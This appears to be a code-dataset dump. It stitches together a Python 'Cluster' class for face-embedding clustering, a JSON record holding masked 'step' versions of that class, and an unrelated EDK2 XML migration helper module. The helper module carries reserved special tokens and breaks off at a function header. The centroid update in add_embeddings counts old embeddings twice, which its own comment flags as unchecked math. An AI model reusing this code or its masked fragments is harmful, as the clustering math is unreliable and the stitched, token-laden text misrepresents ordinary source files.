def add_embedding(self, new_embedding, new_embedding_id=None, overwrite=False):
return self.add_embeddings([new_embedding], [new_embedding_id], overwrite)
def add_embeddings(self, new_embeddings, new_embeddings_ids=None, overwrite=False):
if not new_embeddings:
return
if new_embeddings_ids is None:
next_embedding_id = self.max_embedding_id + 1
new_embeddings_ids = count(start=next_embedding_id)
new_embeddings_dict = dict(zip(new_embeddings_ids, new_embeddings))
if overwrite:
self.embeddings_dict.update(new_embeddings_dict)
else:
new_embeddings_dict.update(self.embeddings_dict)
self.embeddings_dict = new_embeddings_dict
old_num_embeddings = self.num_embeddings
self.num_embeddings = len(self.embeddings_dict)
embeddings = self.get_embeddings(as_list=True)
embeddings_sum = self.sum_embeddings(embeddings)
# TODO: Check the math!!!
if self.center_point is not None:
self.center_point = (old_num_embeddings * self.center_point + embeddings_sum) / self.num_embeddings
else:
self.center_point = embeddings_sum / self.num_embeddings
def remove_embedding_by_id(self, embedding_id):
try:
embedding = self.embeddings_dict.pop(embedding_id)
except KeyError:
log_error(f'embedding with id {embedding_id} not found.')
return
old_num_embeddings = self.num_embeddings
self.num_embeddings -= 1
# TODO: Check the math!!!
# (old_center is a uniformly weighted sum of the old embeddings)
try:
self.center_point = (old_num_embeddings * self.center_point - embedding) / self.num_embeddings
except ZeroDivisionError: # num_embeddings is 0
self.center_point = None
def get_center_point(self):
return self.center_point
def get_embedding(self, embedding_id):
return self.embeddings_dict[embedding_id]
def contains_embedding(self, embedding_id):
return self.embeddings_dict.get(embedding_id) is not None
def compute_dist_to_center(self, embedding):
return self.compute_dist(self.center_point, embedding)
@classmethod
def compute_dist(cls, embedding1, embedding2, metric=None):
if metric is None:
metric = cls.metric
return float(torch.dist(embedding1, embedding2, p=metric))
@staticmethod
def sum_embeddings(embeddings):
    """Element-wise sum of a sequence of same-shaped embedding tensors."""
    stacked = torch.stack(list(embeddings))
    return stacked.sum(dim=0)
|
flexible
|
{
"blob_id": "265c594b12ea45a2dda12e1157e5ea040f4d6ce4",
"index": 9021,
"step-1": "<mask token>\n\n\nclass Cluster:\n <mask token>\n <mask token>\n\n def __len__(self):\n return len(self.embeddings_dict)\n\n def set_label(self, label):\n self.label = label\n <mask token>\n <mask token>\n <mask token>\n\n def get_embeddings_ids(self):\n return self.embeddings_dict.keys()\n <mask token>\n\n def add_embedding(self, new_embedding, new_embedding_id=None, overwrite\n =False):\n return self.add_embeddings([new_embedding], [new_embedding_id],\n overwrite)\n <mask token>\n <mask token>\n\n def get_center_point(self):\n return self.center_point\n <mask token>\n\n def contains_embedding(self, embedding_id):\n return self.embeddings_dict.get(embedding_id) is not None\n <mask token>\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass Cluster:\n <mask token>\n\n def __init__(self, cluster_id, embeddings=None, embeddings_ids=None,\n label=None, center_point=None):\n \"\"\"\n embeddings must be (flat) iterable of embeddings with len applicable\n :param embeddings:\n :param embeddings_ids:\n \"\"\"\n if label is None:\n label = 'Unknown Person'\n self.label = label\n self.max_id_reducer = MaxReducer()\n if embeddings is None:\n self.embeddings_dict = dict()\n self.num_embeddings = 0\n self.center_point = None\n self.max_embedding_id = 0\n self.max_id_reducer(self.max_embedding_id)\n else:\n if embeddings_ids is None:\n embeddings_ids = count(1)\n self.embeddings_dict = dict(zip(embeddings_ids, embeddings))\n self.num_embeddings = len(self.embeddings_dict)\n if center_point is not None:\n self.center_point = center_point\n else:\n self.center_point = self.sum_embeddings(embeddings\n ) / self.num_embeddings\n self.max_id_reducer.process_iterable(self.embeddings_dict.keys())\n self.max_embedding_id = self.max_id_reducer.get_state()\n self.cluster_id = cluster_id\n\n def __len__(self):\n return len(self.embeddings_dict)\n\n def set_label(self, label):\n self.label = label\n\n def set_cluster_id(self, cluster_id):\n self.cluster_id = cluster_id\n\n @classmethod\n def set_metric(cls, metric):\n cls.metric = metric\n <mask token>\n\n def get_embeddings_ids(self):\n return self.embeddings_dict.keys()\n\n def get_size(self):\n return len(self.embeddings_dict)\n\n def add_embedding(self, new_embedding, new_embedding_id=None, overwrite\n =False):\n return self.add_embeddings([new_embedding], [new_embedding_id],\n overwrite)\n\n def add_embeddings(self, new_embeddings, new_embeddings_ids=None,\n overwrite=False):\n if not new_embeddings:\n return\n if new_embeddings_ids is None:\n next_embedding_id = self.max_embedding_id + 1\n new_embeddings_ids = count(start=next_embedding_id)\n new_embeddings_dict = dict(zip(new_embeddings_ids, new_embeddings))\n if overwrite:\n 
self.embeddings_dict.update(new_embeddings_dict)\n else:\n new_embeddings_dict.update(self.embeddings_dict)\n self.embeddings_dict = new_embeddings_dict\n old_num_embeddings = self.num_embeddings\n self.num_embeddings = len(self.embeddings_dict)\n embeddings = self.get_embeddings(as_list=True)\n embeddings_sum = self.sum_embeddings(embeddings)\n if self.center_point is not None:\n self.center_point = (old_num_embeddings * self.center_point +\n embeddings_sum) / self.num_embeddings\n else:\n self.center_point = embeddings_sum / self.num_embeddings\n\n def remove_embedding_by_id(self, embedding_id):\n try:\n embedding = self.embeddings_dict.pop(embedding_id)\n except KeyError:\n log_error(f'embedding with id {embedding_id} not found.')\n return\n old_num_embeddings = self.num_embeddings\n self.num_embeddings -= 1\n try:\n self.center_point = (old_num_embeddings * self.center_point -\n embedding) / self.num_embeddings\n except ZeroDivisionError:\n self.center_point = None\n\n def get_center_point(self):\n return self.center_point\n\n def get_embedding(self, embedding_id):\n return self.embeddings_dict[embedding_id]\n\n def contains_embedding(self, embedding_id):\n return self.embeddings_dict.get(embedding_id) is not None\n\n def compute_dist_to_center(self, embedding):\n return self.compute_dist(self.center_point, embedding)\n\n @classmethod\n def compute_dist(cls, embedding1, embedding2, metric=None):\n if metric is None:\n metric = cls.metric\n return float(torch.dist(embedding1, embedding2, p=metric))\n\n @staticmethod\n def sum_embeddings(embeddings):\n return torch.sum(torch.stack(embeddings), dim=0)\n",
"step-3": "<mask token>\nlogging.basicConfig(level=logging.INFO)\n\n\nclass Cluster:\n metric = 2\n\n def __init__(self, cluster_id, embeddings=None, embeddings_ids=None,\n label=None, center_point=None):\n \"\"\"\n embeddings must be (flat) iterable of embeddings with len applicable\n :param embeddings:\n :param embeddings_ids:\n \"\"\"\n if label is None:\n label = 'Unknown Person'\n self.label = label\n self.max_id_reducer = MaxReducer()\n if embeddings is None:\n self.embeddings_dict = dict()\n self.num_embeddings = 0\n self.center_point = None\n self.max_embedding_id = 0\n self.max_id_reducer(self.max_embedding_id)\n else:\n if embeddings_ids is None:\n embeddings_ids = count(1)\n self.embeddings_dict = dict(zip(embeddings_ids, embeddings))\n self.num_embeddings = len(self.embeddings_dict)\n if center_point is not None:\n self.center_point = center_point\n else:\n self.center_point = self.sum_embeddings(embeddings\n ) / self.num_embeddings\n self.max_id_reducer.process_iterable(self.embeddings_dict.keys())\n self.max_embedding_id = self.max_id_reducer.get_state()\n self.cluster_id = cluster_id\n\n def __len__(self):\n return len(self.embeddings_dict)\n\n def set_label(self, label):\n self.label = label\n\n def set_cluster_id(self, cluster_id):\n self.cluster_id = cluster_id\n\n @classmethod\n def set_metric(cls, metric):\n cls.metric = metric\n\n def get_embeddings(self, with_embeddings_ids=False, as_dict=False,\n as_list=False):\n if with_embeddings_ids or as_dict:\n if as_dict:\n return self.embeddings_dict\n return self.embeddings_dict.items()\n embeddings = self.embeddings_dict.values()\n if as_list:\n return list(embeddings)\n return embeddings\n\n def get_embeddings_ids(self):\n return self.embeddings_dict.keys()\n\n def get_size(self):\n return len(self.embeddings_dict)\n\n def add_embedding(self, new_embedding, new_embedding_id=None, overwrite\n =False):\n return self.add_embeddings([new_embedding], [new_embedding_id],\n overwrite)\n\n def 
add_embeddings(self, new_embeddings, new_embeddings_ids=None,\n overwrite=False):\n if not new_embeddings:\n return\n if new_embeddings_ids is None:\n next_embedding_id = self.max_embedding_id + 1\n new_embeddings_ids = count(start=next_embedding_id)\n new_embeddings_dict = dict(zip(new_embeddings_ids, new_embeddings))\n if overwrite:\n self.embeddings_dict.update(new_embeddings_dict)\n else:\n new_embeddings_dict.update(self.embeddings_dict)\n self.embeddings_dict = new_embeddings_dict\n old_num_embeddings = self.num_embeddings\n self.num_embeddings = len(self.embeddings_dict)\n embeddings = self.get_embeddings(as_list=True)\n embeddings_sum = self.sum_embeddings(embeddings)\n if self.center_point is not None:\n self.center_point = (old_num_embeddings * self.center_point +\n embeddings_sum) / self.num_embeddings\n else:\n self.center_point = embeddings_sum / self.num_embeddings\n\n def remove_embedding_by_id(self, embedding_id):\n try:\n embedding = self.embeddings_dict.pop(embedding_id)\n except KeyError:\n log_error(f'embedding with id {embedding_id} not found.')\n return\n old_num_embeddings = self.num_embeddings\n self.num_embeddings -= 1\n try:\n self.center_point = (old_num_embeddings * self.center_point -\n embedding) / self.num_embeddings\n except ZeroDivisionError:\n self.center_point = None\n\n def get_center_point(self):\n return self.center_point\n\n def get_embedding(self, embedding_id):\n return self.embeddings_dict[embedding_id]\n\n def contains_embedding(self, embedding_id):\n return self.embeddings_dict.get(embedding_id) is not None\n\n def compute_dist_to_center(self, embedding):\n return self.compute_dist(self.center_point, embedding)\n\n @classmethod\n def compute_dist(cls, embedding1, embedding2, metric=None):\n if metric is None:\n metric = cls.metric\n return float(torch.dist(embedding1, embedding2, p=metric))\n\n @staticmethod\n def sum_embeddings(embeddings):\n return torch.sum(torch.stack(embeddings), dim=0)\n",
"step-4": "from Logic.ProperLogic.helper_classes.reducer import MaxReducer\nfrom Logic.ProperLogic.misc_helpers import log_error\nimport torch\nfrom itertools import count\nimport logging\nlogging.basicConfig(level=logging.INFO)\n\n\nclass Cluster:\n metric = 2\n\n def __init__(self, cluster_id, embeddings=None, embeddings_ids=None,\n label=None, center_point=None):\n \"\"\"\n embeddings must be (flat) iterable of embeddings with len applicable\n :param embeddings:\n :param embeddings_ids:\n \"\"\"\n if label is None:\n label = 'Unknown Person'\n self.label = label\n self.max_id_reducer = MaxReducer()\n if embeddings is None:\n self.embeddings_dict = dict()\n self.num_embeddings = 0\n self.center_point = None\n self.max_embedding_id = 0\n self.max_id_reducer(self.max_embedding_id)\n else:\n if embeddings_ids is None:\n embeddings_ids = count(1)\n self.embeddings_dict = dict(zip(embeddings_ids, embeddings))\n self.num_embeddings = len(self.embeddings_dict)\n if center_point is not None:\n self.center_point = center_point\n else:\n self.center_point = self.sum_embeddings(embeddings\n ) / self.num_embeddings\n self.max_id_reducer.process_iterable(self.embeddings_dict.keys())\n self.max_embedding_id = self.max_id_reducer.get_state()\n self.cluster_id = cluster_id\n\n def __len__(self):\n return len(self.embeddings_dict)\n\n def set_label(self, label):\n self.label = label\n\n def set_cluster_id(self, cluster_id):\n self.cluster_id = cluster_id\n\n @classmethod\n def set_metric(cls, metric):\n cls.metric = metric\n\n def get_embeddings(self, with_embeddings_ids=False, as_dict=False,\n as_list=False):\n if with_embeddings_ids or as_dict:\n if as_dict:\n return self.embeddings_dict\n return self.embeddings_dict.items()\n embeddings = self.embeddings_dict.values()\n if as_list:\n return list(embeddings)\n return embeddings\n\n def get_embeddings_ids(self):\n return self.embeddings_dict.keys()\n\n def get_size(self):\n return len(self.embeddings_dict)\n\n def 
add_embedding(self, new_embedding, new_embedding_id=None, overwrite\n =False):\n return self.add_embeddings([new_embedding], [new_embedding_id],\n overwrite)\n\n def add_embeddings(self, new_embeddings, new_embeddings_ids=None,\n overwrite=False):\n if not new_embeddings:\n return\n if new_embeddings_ids is None:\n next_embedding_id = self.max_embedding_id + 1\n new_embeddings_ids = count(start=next_embedding_id)\n new_embeddings_dict = dict(zip(new_embeddings_ids, new_embeddings))\n if overwrite:\n self.embeddings_dict.update(new_embeddings_dict)\n else:\n new_embeddings_dict.update(self.embeddings_dict)\n self.embeddings_dict = new_embeddings_dict\n old_num_embeddings = self.num_embeddings\n self.num_embeddings = len(self.embeddings_dict)\n embeddings = self.get_embeddings(as_list=True)\n embeddings_sum = self.sum_embeddings(embeddings)\n if self.center_point is not None:\n self.center_point = (old_num_embeddings * self.center_point +\n embeddings_sum) / self.num_embeddings\n else:\n self.center_point = embeddings_sum / self.num_embeddings\n\n def remove_embedding_by_id(self, embedding_id):\n try:\n embedding = self.embeddings_dict.pop(embedding_id)\n except KeyError:\n log_error(f'embedding with id {embedding_id} not found.')\n return\n old_num_embeddings = self.num_embeddings\n self.num_embeddings -= 1\n try:\n self.center_point = (old_num_embeddings * self.center_point -\n embedding) / self.num_embeddings\n except ZeroDivisionError:\n self.center_point = None\n\n def get_center_point(self):\n return self.center_point\n\n def get_embedding(self, embedding_id):\n return self.embeddings_dict[embedding_id]\n\n def contains_embedding(self, embedding_id):\n return self.embeddings_dict.get(embedding_id) is not None\n\n def compute_dist_to_center(self, embedding):\n return self.compute_dist(self.center_point, embedding)\n\n @classmethod\n def compute_dist(cls, embedding1, embedding2, metric=None):\n if metric is None:\n metric = cls.metric\n return 
float(torch.dist(embedding1, embedding2, p=metric))\n\n @staticmethod\n def sum_embeddings(embeddings):\n return torch.sum(torch.stack(embeddings), dim=0)\n",
"step-5": "from Logic.ProperLogic.helper_classes.reducer import MaxReducer\nfrom Logic.ProperLogic.misc_helpers import log_error\nimport torch\n\nfrom itertools import count\n\nimport logging\nlogging.basicConfig(level=logging.INFO)\n\n\nclass Cluster:\n metric = 2\n\n def __init__(self, cluster_id, embeddings=None, embeddings_ids=None, label=None, center_point=None):\n \"\"\"\n embeddings must be (flat) iterable of embeddings with len applicable\n :param embeddings:\n :param embeddings_ids:\n \"\"\"\n if label is None:\n label = 'Unknown Person'\n self.label = label\n self.max_id_reducer = MaxReducer()\n if embeddings is None:\n self.embeddings_dict = dict()\n self.num_embeddings = 0\n self.center_point = None\n self.max_embedding_id = 0\n self.max_id_reducer(self.max_embedding_id)\n else:\n if embeddings_ids is None:\n embeddings_ids = count(1)\n # cast embeddings to dict\n self.embeddings_dict = dict(zip(embeddings_ids, embeddings))\n self.num_embeddings = len(self.embeddings_dict)\n if center_point is not None:\n self.center_point = center_point\n else:\n self.center_point = self.sum_embeddings(embeddings) / self.num_embeddings\n self.max_id_reducer.process_iterable(self.embeddings_dict.keys())\n self.max_embedding_id = self.max_id_reducer.get_state()\n\n self.cluster_id = cluster_id\n\n def __len__(self):\n return len(self.embeddings_dict)\n\n def set_label(self, label):\n self.label = label\n\n def set_cluster_id(self, cluster_id):\n self.cluster_id = cluster_id\n\n @classmethod\n def set_metric(cls, metric):\n cls.metric = metric\n\n def get_embeddings(self, with_embeddings_ids=False, as_dict=False, as_list=False):\n if with_embeddings_ids or as_dict:\n if as_dict:\n return self.embeddings_dict\n return self.embeddings_dict.items()\n\n embeddings = self.embeddings_dict.values()\n if as_list:\n return list(embeddings)\n return embeddings\n\n def get_embeddings_ids(self):\n return self.embeddings_dict.keys()\n\n def get_size(self):\n return 
len(self.embeddings_dict)\n\n def add_embedding(self, new_embedding, new_embedding_id=None, overwrite=False):\n return self.add_embeddings([new_embedding], [new_embedding_id], overwrite)\n\n def add_embeddings(self, new_embeddings, new_embeddings_ids=None, overwrite=False):\n if not new_embeddings:\n return\n\n if new_embeddings_ids is None:\n next_embedding_id = self.max_embedding_id + 1\n new_embeddings_ids = count(start=next_embedding_id)\n\n new_embeddings_dict = dict(zip(new_embeddings_ids, new_embeddings))\n if overwrite:\n self.embeddings_dict.update(new_embeddings_dict)\n else:\n new_embeddings_dict.update(self.embeddings_dict)\n self.embeddings_dict = new_embeddings_dict\n\n old_num_embeddings = self.num_embeddings\n self.num_embeddings = len(self.embeddings_dict)\n embeddings = self.get_embeddings(as_list=True)\n embeddings_sum = self.sum_embeddings(embeddings)\n\n # TODO: Check the math!!!\n if self.center_point is not None:\n self.center_point = (old_num_embeddings * self.center_point + embeddings_sum) / self.num_embeddings\n else:\n self.center_point = embeddings_sum / self.num_embeddings\n\n def remove_embedding_by_id(self, embedding_id):\n try:\n embedding = self.embeddings_dict.pop(embedding_id)\n except KeyError:\n log_error(f'embedding with id {embedding_id} not found.')\n return\n\n old_num_embeddings = self.num_embeddings\n self.num_embeddings -= 1\n\n # TODO: Check the math!!!\n\n # (old_center is a uniformly weighted sum of the old embeddings)\n try:\n self.center_point = (old_num_embeddings * self.center_point - embedding) / self.num_embeddings\n except ZeroDivisionError: # num_embeddings is 0\n self.center_point = None\n\n def get_center_point(self):\n return self.center_point\n\n def get_embedding(self, embedding_id):\n return self.embeddings_dict[embedding_id]\n\n def contains_embedding(self, embedding_id):\n return self.embeddings_dict.get(embedding_id) is not None\n\n def compute_dist_to_center(self, embedding):\n return 
self.compute_dist(self.center_point, embedding)\n\n @classmethod\n def compute_dist(cls, embedding1, embedding2, metric=None):\n if metric is None:\n metric = cls.metric\n return float(torch.dist(embedding1, embedding2, p=metric))\n\n @staticmethod\n def sum_embeddings(embeddings):\n # return reduce(torch.add, embeddings)\n return torch.sum(torch.stack(embeddings), dim=0)\n",
"step-ids": [
7,
17,
20,
21,
22
]
}
|
[
7,
17,
20,
21,
22
] |
<|reserved_special_token_0|>
def SetCommon(Common, XmlCommon):
    """Populate the attributes shared by all entry types (usage, feature flag,
    supported architectures, help text) from the XML node XmlCommon."""
    Common.Usage = XmlAttribute(XmlCommon, 'Usage').split()
    Common.FeatureFlag = XmlAttribute(XmlCommon, 'FeatureFlag')
    Common.SupArchList = XmlAttribute(XmlCommon, 'SupArchList').split()
    HelpTextTag = XmlNodeName(XmlCommon) + '/' + 'HelpText'
    Common.HelpText = XmlElement(XmlCommon, HelpTextTag)
def SetIdentification(CommonHeader, XmlCommonHeader, NameTag, FileName):
    """Fill the identification fields (name, guid, version, file paths) of a
    header object from the XML node XmlCommonHeader and the file name."""
    XmlParentTag = XmlNodeName(XmlCommonHeader)
    CommonHeader.Name = XmlElement(XmlCommonHeader, XmlParentTag + '/' + NameTag)
    CommonHeader.Guid = XmlElement(XmlCommonHeader, XmlParentTag + '/' + 'GuidValue')
    CommonHeader.Version = XmlElement(XmlCommonHeader, XmlParentTag + '/' + 'Version')
    CommonHeader.FileName = os.path.basename(FileName)
    CommonHeader.FullPath = os.path.abspath(FileName)
<|reserved_special_token_0|>
def AddToSpecificationDict(SpecificationDict, SpecificationString):
    """Abstract specification name, value pair from Specification String"""
    for Match in mReSpecification.finditer(SpecificationString):
        SpecificationDict[Match.group('Specification')] = Match.group('Value')
<|reserved_special_token_0|>
def LoadClonedRecord(XmlCloned):
    """Build a ClonedRecordClass object from a Cloned XML node."""
    ClonedRecord = ClonedRecordClass()
    ClonedRecord.Id = int(XmlAttribute(XmlCloned, 'Id'))
    ClonedRecord.FarGuid = XmlAttribute(XmlCloned, 'FarGuid')
    for Attr, XmlTag in (('PackageGuid', 'Cloned/PackageGuid'),
                         ('PackageVersion', 'Cloned/PackageVersion'),
                         ('ModuleGuid', 'Cloned/ModuleGuid'),
                         ('ModuleVersion', 'Cloned/ModuleVersion')):
        setattr(ClonedRecord, Attr, XmlElement(XmlCloned, XmlTag))
    return ClonedRecord
def LoadGuidProtocolPpiCommon(XmlGuidProtocolPpiCommon):
    """Build a GuidProtocolPpiCommonClass object from a Guid/Protocol/Ppi XML node.

    The C-name child tag depends on the parent element name: 'Entry' uses
    C_Name, 'GuidCNames' uses GuidCName, anything else uses '<Parent>CName'.
    A parent name ending in 'Notify' marks the record as a notification.
    """
    GuidProtocolPpiCommon = GuidProtocolPpiCommonClass()
    XmlTag = 'Name'
    GuidProtocolPpiCommon.Name = XmlAttribute(XmlGuidProtocolPpiCommon, XmlTag)
    XmlParent = XmlNodeName(XmlGuidProtocolPpiCommon)
    # Select the tag holding the C name based on the enclosing element.
    if XmlParent == 'Entry':
        XmlTag = '%s/C_Name' % XmlParent
    elif XmlParent == 'GuidCNames':
        XmlTag = '%s/GuidCName' % XmlParent
    else:
        XmlTag = '%s/%sCName' % (XmlParent, XmlParent)
    GuidProtocolPpiCommon.CName = XmlElement(XmlGuidProtocolPpiCommon, XmlTag)
    XmlTag = XmlParent + '/' + 'GuidValue'
    GuidProtocolPpiCommon.Guid = XmlElement(XmlGuidProtocolPpiCommon, XmlTag)
    # e.g. <GuidNotify>/<PpiNotify> parents describe notification registrations
    if XmlParent.endswith('Notify'):
        GuidProtocolPpiCommon.Notify = True
    XmlTag = 'GuidTypeList'
    GuidTypes = XmlAttribute(XmlGuidProtocolPpiCommon, XmlTag)
    GuidProtocolPpiCommon.GuidTypeList = GuidTypes.split()
    XmlTag = 'SupModuleList'
    SupModules = XmlAttribute(XmlGuidProtocolPpiCommon, XmlTag)
    GuidProtocolPpiCommon.SupModuleList = SupModules.split()
    # Fill in the attributes shared by all entry types (usage, arch list, ...).
    SetCommon(GuidProtocolPpiCommon, XmlGuidProtocolPpiCommon)
    return GuidProtocolPpiCommon
def LoadPcd(XmlPcd):
    """Return a new PcdClass object equivalent to XmlPcd"""
    Pcd = PcdClass()
    Pcd.CName = XmlElement(XmlPcd, 'PcdEntry/C_Name')
    Pcd.Token = XmlElement(XmlPcd, 'PcdEntry/Token')
    Pcd.TokenSpaceGuidCName = XmlElement(XmlPcd, 'PcdEntry/TokenSpaceGuidCName')
    Pcd.DatumType = XmlElement(XmlPcd, 'PcdEntry/DatumType')
    Pcd.MaxDatumSize = XmlElement(XmlPcd, 'PcdEntry/MaxDatumSize')
    Pcd.DefaultValue = XmlElement(XmlPcd, 'PcdEntry/DefaultValue')
    Pcd.ItemType = XmlAttribute(XmlPcd, 'PcdItemType')
    Pcd.ValidUsage = XmlElement(XmlPcd, 'PcdEntry/ValidUsage').split()
    Pcd.SupModuleList = XmlAttribute(XmlPcd, 'SupModuleList').split()
    SetCommon(Pcd, XmlPcd)
    return Pcd
<|reserved_special_token_0|>
def StoreTextFile(TextFile, Content):
    """Log Content at verbose level, then append it to the open TextFile handle."""
    EdkLogger.verbose(Content)
    TextFile.write(Content)
def AddToSection(Section, Arch, Item):
    """Append Item to Section[Arch] unless already present, creating the
    per-arch list on first use."""
    Items = Section.setdefault(Arch, [])
    if Item not in Items:
        Items.append(Item)
<|reserved_special_token_0|>
def GetUserExtensions(UserExtensions):
    """Render a UserExtensions object as a '[UserExtensions.<user>.<id>]' text section."""
    return '[UserExtensions.%s.%s]\n %s\n\n' % (
        UserExtensions.UserID, UserExtensions.Identifier, UserExtensions.Content)
<|reserved_special_token_0|>
def GetXmlFileInfo(FileName, TagTuple):
    """Parse FileName as XML and return a tuple of element values, one per tag
    in TagTuple."""
    XmlDom = XmlParseFile(FileName)
    return tuple(XmlElement(XmlDom, XmlTag) for XmlTag in TagTuple)
def MigrationOptionParser(Source, Destinate, ToolName, VersionNumber=1.0):
    """Parse command-line options for a Source -> Destinate migration tool.

    Supports -o/--output, -a/--auto (derive output name from the input name),
    and -q/-v verbosity switches. Returns (Options, InputFile); raises
    MigrationError for missing/conflicting options or a nonexistent input file.
    """
    UsageString = '%s [-a] [-v|-q] [-o <output_file>] <input_file>' % ToolName
    Version = '%s Version %.2f' % (ToolName, VersionNumber)
    Copyright = 'Copyright (c) 2007, Intel Corporation. All rights reserved.'
    Parser = OptionParser(description=Copyright, version=Version, usage=
        UsageString)
    Parser.add_option('-o', '--output', dest='OutputFile', help=
        'The name of the %s file to be created.' % Destinate)
    Parser.add_option('-a', '--auto', dest='AutoWrite', action='store_true',
        default=False, help=
        'Automatically create the %s file using the name of the %s file and replacing file extension'
         % (Source, Destinate))
    Parser.add_option('-q', '--quiet', action='store_true', type=None, help
        ='Disable all messages except FATAL ERRORS.')
    Parser.add_option('-v', '--verbose', action='store_true', type=None,
        help='Turn on verbose output with informational messages printed.')
    Options, Args = Parser.parse_args()
    # Map the verbosity flags onto the global logger level.
    if Options.verbose:
        EdkLogger.setLevel(EdkLogger.VERBOSE)
    elif Options.quiet:
        EdkLogger.setLevel(EdkLogger.QUIET)
    else:
        EdkLogger.setLevel(EdkLogger.INFO)
    # Exactly one positional input file is required.
    if len(Args) == 0:
        raise MigrationError(PARAMETER_MISSING, name='Input file', usage=
            Parser.get_usage())
    if len(Args) > 1:
        raise MigrationError(PARAMETER_INVALID, name='Too many input files',
            usage=Parser.get_usage())
    InputFile = Args[0]
    if not os.path.exists(InputFile):
        raise MigrationError(FILE_NOT_FOUND, name=InputFile)
    # -o and -a are mutually exclusive; -a derives the output name by swapping
    # the input file's extension for the destination format's extension.
    if Options.OutputFile:
        if Options.AutoWrite:
            raise MigrationError(OPTION_CONFLICT, arg1='-o', arg2='-a',
                usage=Parser.get_usage())
    elif Options.AutoWrite:
        Options.OutputFile = os.path.splitext(InputFile)[0
            ] + '.' + Destinate.lower()
    else:
        raise MigrationError(OPTION_MISSING, name='-o', usage=Parser.
            get_usage())
    return Options, InputFile
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def SetCommon(Common, XmlCommon):
XmlTag = 'Usage'
Common.Usage = XmlAttribute(XmlCommon, XmlTag).split()
XmlTag = 'FeatureFlag'
Common.FeatureFlag = XmlAttribute(XmlCommon, XmlTag)
XmlTag = 'SupArchList'
Common.SupArchList = XmlAttribute(XmlCommon, XmlTag).split()
XmlTag = XmlNodeName(XmlCommon) + '/' + 'HelpText'
Common.HelpText = XmlElement(XmlCommon, XmlTag)
def SetIdentification(CommonHeader, XmlCommonHeader, NameTag, FileName):
XmlParentTag = XmlNodeName(XmlCommonHeader)
XmlTag = XmlParentTag + '/' + NameTag
CommonHeader.Name = XmlElement(XmlCommonHeader, XmlTag)
XmlTag = XmlParentTag + '/' + 'GuidValue'
CommonHeader.Guid = XmlElement(XmlCommonHeader, XmlTag)
XmlTag = XmlParentTag + '/' + 'Version'
CommonHeader.Version = XmlElement(XmlCommonHeader, XmlTag)
CommonHeader.FileName = os.path.basename(FileName)
CommonHeader.FullPath = os.path.abspath(FileName)
<|reserved_special_token_0|>
def AddToSpecificationDict(SpecificationDict, SpecificationString):
"""Abstract specification name, value pair from Specification String"""
for SpecificationMatch in mReSpecification.finditer(SpecificationString):
Specification = SpecificationMatch.group('Specification')
Value = SpecificationMatch.group('Value')
SpecificationDict[Specification] = Value
def SetCommonHeader(CommonHeader, XmlCommonHeader):
    """Set all attributes of CommonHeaderClass object from XmlCommonHeader"""
    XmlParent = XmlNodeName(XmlCommonHeader)
    for Attr in ('Abstract', 'Description', 'Copyright', 'License'):
        setattr(CommonHeader, Attr,
                XmlElement(XmlCommonHeader, XmlParent + '/' + Attr))
    Specification = XmlElement(XmlCommonHeader, XmlParent + '/' + 'Specification')
    AddToSpecificationDict(CommonHeader.Specification, Specification)
    CommonHeader.ModuleType = XmlElement(XmlCommonHeader, XmlParent + '/' + 'ModuleType')
def LoadClonedRecord(XmlCloned):
ClonedRecord = ClonedRecordClass()
XmlTag = 'Id'
ClonedRecord.Id = int(XmlAttribute(XmlCloned, XmlTag))
XmlTag = 'FarGuid'
ClonedRecord.FarGuid = XmlAttribute(XmlCloned, XmlTag)
XmlTag = 'Cloned/PackageGuid'
ClonedRecord.PackageGuid = XmlElement(XmlCloned, XmlTag)
XmlTag = 'Cloned/PackageVersion'
ClonedRecord.PackageVersion = XmlElement(XmlCloned, XmlTag)
XmlTag = 'Cloned/ModuleGuid'
ClonedRecord.ModuleGuid = XmlElement(XmlCloned, XmlTag)
XmlTag = 'Cloned/ModuleVersion'
ClonedRecord.ModuleVersion = XmlElement(XmlCloned, XmlTag)
return ClonedRecord
def LoadGuidProtocolPpiCommon(XmlGuidProtocolPpiCommon):
GuidProtocolPpiCommon = GuidProtocolPpiCommonClass()
XmlTag = 'Name'
GuidProtocolPpiCommon.Name = XmlAttribute(XmlGuidProtocolPpiCommon, XmlTag)
XmlParent = XmlNodeName(XmlGuidProtocolPpiCommon)
if XmlParent == 'Entry':
XmlTag = '%s/C_Name' % XmlParent
elif XmlParent == 'GuidCNames':
XmlTag = '%s/GuidCName' % XmlParent
else:
XmlTag = '%s/%sCName' % (XmlParent, XmlParent)
GuidProtocolPpiCommon.CName = XmlElement(XmlGuidProtocolPpiCommon, XmlTag)
XmlTag = XmlParent + '/' + 'GuidValue'
GuidProtocolPpiCommon.Guid = XmlElement(XmlGuidProtocolPpiCommon, XmlTag)
if XmlParent.endswith('Notify'):
GuidProtocolPpiCommon.Notify = True
XmlTag = 'GuidTypeList'
GuidTypes = XmlAttribute(XmlGuidProtocolPpiCommon, XmlTag)
GuidProtocolPpiCommon.GuidTypeList = GuidTypes.split()
XmlTag = 'SupModuleList'
SupModules = XmlAttribute(XmlGuidProtocolPpiCommon, XmlTag)
GuidProtocolPpiCommon.SupModuleList = SupModules.split()
SetCommon(GuidProtocolPpiCommon, XmlGuidProtocolPpiCommon)
return GuidProtocolPpiCommon
def LoadPcd(XmlPcd):
"""Return a new PcdClass object equivalent to XmlPcd"""
Pcd = PcdClass()
XmlTag = 'PcdEntry/C_Name'
Pcd.CName = XmlElement(XmlPcd, XmlTag)
XmlTag = 'PcdEntry/Token'
Pcd.Token = XmlElement(XmlPcd, XmlTag)
XmlTag = 'PcdEntry/TokenSpaceGuidCName'
Pcd.TokenSpaceGuidCName = XmlElement(XmlPcd, XmlTag)
XmlTag = 'PcdEntry/DatumType'
Pcd.DatumType = XmlElement(XmlPcd, XmlTag)
XmlTag = 'PcdEntry/MaxDatumSize'
Pcd.MaxDatumSize = XmlElement(XmlPcd, XmlTag)
XmlTag = 'PcdEntry/DefaultValue'
Pcd.DefaultValue = XmlElement(XmlPcd, XmlTag)
XmlTag = 'PcdItemType'
Pcd.ItemType = XmlAttribute(XmlPcd, XmlTag)
XmlTag = 'PcdEntry/ValidUsage'
Pcd.ValidUsage = XmlElement(XmlPcd, XmlTag).split()
XmlTag = 'SupModuleList'
Pcd.SupModuleList = XmlAttribute(XmlPcd, XmlTag).split()
SetCommon(Pcd, XmlPcd)
return Pcd
def LoadLibraryClass(XmlLibraryClass):
